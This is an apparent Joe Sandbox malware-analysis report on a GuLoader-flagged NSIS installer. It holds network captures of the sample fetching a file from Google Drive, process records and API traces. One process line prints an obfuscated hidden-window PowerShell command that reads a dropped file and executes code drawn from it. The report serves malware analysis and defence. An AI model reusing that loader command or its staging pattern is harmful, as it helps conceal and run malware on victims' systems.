2024-12-03 15:44:58 UTC	460	OUT	GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:59 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:59 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-5u_aELJgQcxXQRneYHJ_bQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 X-GUploader-UploadID: AFiumC6q7JIspnS2vBysMyt0_LXY8EGBdX-GFKFfnZcJ9pam3s21yzbqVHekFt0pKhEJQi6DfKc4i1skiA Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:44:59 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 61 6a 70 48 34 57 66 46 65 75 4c 77 77 43 4e 38 39 68 5a 50 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NajpH4WfFeuLwwCN89hZPQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.9	49738	172.217.19.174	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:45:01 UTC	418	OUT	GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:45:02 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:45:02 GMT Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-pgdqZdNE_nbs3XKxmau0Ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Target ID:	0
Start time:	10:42:57
Start date:	03/12/2024
Path:	C:\Users\user\Desktop\AwMu7gR48D.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\AwMu7gR48D.exe"
Imagebase:	0x400000
File size:	500'524 bytes
MD5 hash:	E910DD39A106DFB09F31945608899357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:43:01
Start date:	03/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)"
Imagebase:	0xd20000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1861341380.000000000A4CF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:43:01
Start date:	03/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:43:38
Start date:	03/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x560000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2675534905.0000000004C8F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	20.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.1%
Total number of Nodes:	1334
Total number of Limit Nodes:	32

Executed Functions

Function 004031BB Relevance: 89.6, APIs: 33, Strings: 18, Instructions: 368
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004031E0
GetVersion.KERNEL32 ref: 004031E6
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403219
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403255
OleInitialize.OLE32(00000000), ref: 0040325C
SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403278
GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 0040328D
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\AwMu7gR48D.exe",00000000,?,00000006,00000008,0000000A), ref: 004032A0
CharNextA.USER32(00000000,"C:\Users\user\Desktop\AwMu7gR48D.exe",00000020,?,00000006,00000008,0000000A), ref: 004032CB
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033C8
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004033D9
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004033E5
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004033F9
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403401
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403412
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040341A
DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040342E

Part of subcall function 004062C7: GetModuleHandleA.KERNEL32(?,?,?,0040322E,0000000A), ref: 004062D9
Part of subcall function 004062C7: GetProcAddress.KERNEL32(00000000,?), ref: 004062F4

Part of subcall function 00405F2F: lstrcpynA.KERNEL32(?,?,00000400,0040328D,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F3C

Part of subcall function 0040377F: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\unshabbily,1033,Solidariseringerne Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Solidariseringerne Setup: Completed,00000000,00000002,76F93410), ref: 0040386F
Part of subcall function 0040377F: lstrcmpiA.KERNEL32(?,.exe), ref: 00403882
Part of subcall function 0040377F: GetFileAttributesA.KERNEL32(: Completed), ref: 0040388D
Part of subcall function 0040377F: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\unshabbily), ref: 004038D6
Part of subcall function 0040377F: RegisterClassA.USER32(00422EA0), ref: 00403913

Part of subcall function 004036A5: CloseHandle.KERNEL32(000002B8,004034DC,?,?,00000006,00000008,0000000A), ref: 004036B0

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 004034DC
ExitProcess.KERNEL32 ref: 004034FD
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 0040361A
OpenProcessToken.ADVAPI32(00000000), ref: 00403621
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403639
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403658
ExitWindowsEx.USER32(00000002,80040002), ref: 0040367C
ExitProcess.KERNEL32 ref: 0040369F

Part of subcall function 0040564B: MessageBoxIndirectA.USER32(00409218), ref: 004056A6

Strings

\Temp, xrefs: 004033DF
Error launching installer, xrefs: 00403494
1033, xrefs: 00403429
", xrefs: 004032F0
NSIS Error, xrefs: 0040327E
UXTHEME, xrefs: 0040320D, 00403212, 00403218
Low, xrefs: 004033FB
C:\Users\user\Desktop, xrefs: 0040352F, 00403534, 00403560
C:\Users\user\Desktop\AwMu7gR48D.exe, xrefs: 004035BA
C:\Users\user\AppData\Local\Temp\, xrefs: 004033BD, 004033C2, 004033D8, 004033E4, 004033F3, 00403400, 0040340C, 00403414, 0040350D, 0040351E, 00403529, 00403535, 00403542, 00403551, 00403600
~nsu, xrefs: 00403508
TEMP, xrefs: 0040340D
SeShutdownPrivilege, xrefs: 00403633
"C:\Users\user\Desktop\AwMu7gR48D.exe", xrefs: 00403293, 00403299, 00403452
C:\Users\user\AppData\Local\unshabbily, xrefs: 004033AD, 004034AE, 00403558, 00403561
C:\Users\user\AppData\Local\unshabbily\Hardwire, xrefs: 004034B9
TMP, xrefs: 00403415
.tmp, xrefs: 00403524

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: Process$ExitFileHandle$EnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpilstrcpyn
String ID: "$"C:\Users\user\Desktop\AwMu7gR48D.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\unshabbily$C:\Users\user\AppData\Local\unshabbily\Hardwire$C:\Users\user\Desktop$C:\Users\user\Desktop\AwMu7gR48D.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3855923921-2475149311
Opcode ID: 41a2d84af2d5407adc1c32c5249e47afef491bae6f079a6a4bd1fd594076673a
Instruction ID: af4360d81dc256b8c9424dc56f1358f7fe08c6a718ebf40f6c8df5272bc15683
Opcode Fuzzy Hash: 41a2d84af2d5407adc1c32c5249e47afef491bae6f079a6a4bd1fd594076673a
Instruction Fuzzy Hash: 14C1F5706086427AE7217F719D49B2B3EACEB85306F04457FF541B62E2C77C9A058B2E

Function 00405194 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 004051F3
GetDlgItem.USER32(?,000003EE), ref: 00405202
GetClientRect.USER32(?,?), ref: 0040523F
GetSystemMetrics.USER32(00000002), ref: 00405246
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405267
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405278
SendMessageA.USER32(?,00001001,00000000,?), ref: 0040528B
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405299
SendMessageA.USER32(?,00001024,00000000,?), ref: 004052AC
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004052CE
ShowWindow.USER32(?,00000008), ref: 004052E2
GetDlgItem.USER32(?,000003EC), ref: 00405303
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405313
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040532C
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405338
GetDlgItem.USER32(?,000003F8), ref: 00405211

Part of subcall function 00404025: SendMessageA.USER32(00000028,?,00000001,00403E55), ref: 00404033

GetDlgItem.USER32(?,000003EC), ref: 00405354
CreateThread.KERNELBASE(00000000,00000000,Function_00005128,00000000), ref: 00405362
CloseHandle.KERNELBASE(00000000), ref: 00405369
ShowWindow.USER32(00000000), ref: 0040538C
ShowWindow.USER32(?,00000008), ref: 00405393
ShowWindow.USER32(00000008), ref: 004053D9
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040540D
CreatePopupMenu.USER32 ref: 0040541E
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405433
GetWindowRect.USER32(?,000000FF), ref: 00405453
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040546C
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054A8
OpenClipboard.USER32(00000000), ref: 004054B8
EmptyClipboard.USER32 ref: 004054BE
GlobalAlloc.KERNEL32(00000042,?), ref: 004054C7
GlobalLock.KERNEL32(00000000), ref: 004054D1
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054E5
GlobalUnlock.KERNEL32(00000000), ref: 004054FE
SetClipboardData.USER32(00000001,00000000), ref: 00405509
CloseClipboard.USER32 ref: 0040550F

Strings

Solidariseringerne Setup: Completed, xrefs: 00405484

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: Solidariseringerne Setup: Completed
API String ID: 590372296-345998224
Opcode ID: 7ce4c4186a3c3c97c38a9d5959e83e30d411a0e44afbdab31a022d6e1ea2659f
Instruction ID: ffe0cad38c51bf677d90d52cc1be9089f0253f1d9aa70b106fb857e880bd7d9d
Opcode Fuzzy Hash: 7ce4c4186a3c3c97c38a9d5959e83e30d411a0e44afbdab31a022d6e1ea2659f
Instruction Fuzzy Hash: B5A15AB1900208BFDB119FA4DD89AAE7F79FB08355F00403AFA05B62A0C7B55E51DF69

Function 004056F7 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405720
lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405768
lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405789
lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040578F
FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057A0
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040584D
FindClose.KERNEL32(00000000), ref: 0040585E

Strings

"C:\Users\user\Desktop\AwMu7gR48D.exe", xrefs: 004056F7
\*.*, xrefs: 00405762
C:\Users\user\AppData\Local\Temp\, xrefs: 00405704

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\AwMu7gR48D.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3426257497
Opcode ID: e000b3a5de225f2f8b08f8ac0f3545d1e84fc9896e5a7d05d742c6501ffd0423
Instruction ID: 5202cdaf7196988d1da3935d2d892696f3640e5f60657e92f8c59f35d89726bd
Opcode Fuzzy Hash: e000b3a5de225f2f8b08f8ac0f3545d1e84fc9896e5a7d05d742c6501ffd0423
Instruction Fuzzy Hash: 02519F32800A04BADB217B618C45BAF7B78DF42754F14847BF851761D2D73C8A92DEAE

Function 004065BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32e752b298fae306bc4e8e2fa827520659811e589a0f8e200775ab13b43d47c9
Instruction ID: 82117b2ed1b037f842d7e8ec4a077ce5a2ba4b06f200654bc1e2ca7552b06de8
Opcode Fuzzy Hash: 32e752b298fae306bc4e8e2fa827520659811e589a0f8e200775ab13b43d47c9
Instruction Fuzzy Hash: BCF16474D00229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96CF44

Function 00406232 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(76F93410,00421558,C:\Users\user\AppData\Local\Temp\nspE492.tmp,004059F8,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,00000000,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76F93410,C:\Users\user\AppData\Local\Temp\), ref: 0040623D
FindClose.KERNEL32(00000000), ref: 00406249

Strings

C:\Users\user\AppData\Local\Temp\nspE492.tmp, xrefs: 00406232

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nspE492.tmp
API String ID: 2295610775-2162577230
Opcode ID: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
Instruction ID: 7cf403c7a0a34fa6c1bdd97e039e734b9fb45dc45bcdba9fead32da54c1b9644
Opcode Fuzzy Hash: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
Instruction Fuzzy Hash: 19D0C9329090206BC3106628AC0C84B6A599B953717118A76B56AF12E0D238986286A9

Function 00403B1C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B58
ShowWindow.USER32(?), ref: 00403B75
DestroyWindow.USER32 ref: 00403B89
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BA5
GetDlgItem.USER32(?,?), ref: 00403BC6
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BDA
IsWindowEnabled.USER32(00000000), ref: 00403BE1
GetDlgItem.USER32(?,00000001), ref: 00403C8F
GetDlgItem.USER32(?,00000002), ref: 00403C99
SetClassLongA.USER32(?,000000F2,?), ref: 00403CB3
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D04
GetDlgItem.USER32(?,00000003), ref: 00403DAA
ShowWindow.USER32(00000000,?), ref: 00403DCB
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DDD
EnableWindow.USER32(?,?), ref: 00403DF8
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E0E
EnableMenuItem.USER32(00000000), ref: 00403E15
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E2D
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E40
lstrlenA.KERNEL32(Solidariseringerne Setup: Completed,?,Solidariseringerne Setup: Completed,00000000), ref: 00403E6A
SetWindowTextA.USER32(?,Solidariseringerne Setup: Completed), ref: 00403E79
ShowWindow.USER32(?,0000000A), ref: 00403FAD

Strings

Solidariseringerne Setup: Completed, xrefs: 00403E5A, 00403E60, 00403E69, 00403E77

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
